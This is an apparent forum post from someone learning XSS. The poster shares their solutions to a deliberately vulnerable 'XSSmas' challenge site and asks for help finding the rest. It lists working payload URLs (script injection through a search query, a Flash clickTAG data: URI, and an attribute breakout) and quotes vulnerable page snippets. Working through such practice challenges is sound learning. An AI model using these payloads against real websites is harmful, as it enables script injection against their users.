Encontré esto: enlace
Y hasta ahora mis soluciones fueron:
1.http://research.insecurelabs.org/xssmas/search.php?query=<script>alert(0)</script>
2. http://research.insecurelabs.org/xssmas/xssmas.swf?clickTAG=data:text/html,<script>alert(0)</script>
pero parece que hay cinco soluciones. ¿Puede alguien ayudarme? Estoy tratando de aprender más sobre XSS. gracias
UPDATED:
I know that two other solutions are related to this:
1.
<script>
var n = '';
if (n != '') {
$(function() {
$("h1").html("Merry XSSmas, " + unescape(n) + "!");
});
}
</script>
2.
<script>
<!-- Analytics: no change below this line -->
document.write('<img src="analytics?url=">');
</script>
Update solved no2:
http://research.insecurelabs.org/xssmas/?url=maxa"><fake></script><script>alert(0)</script>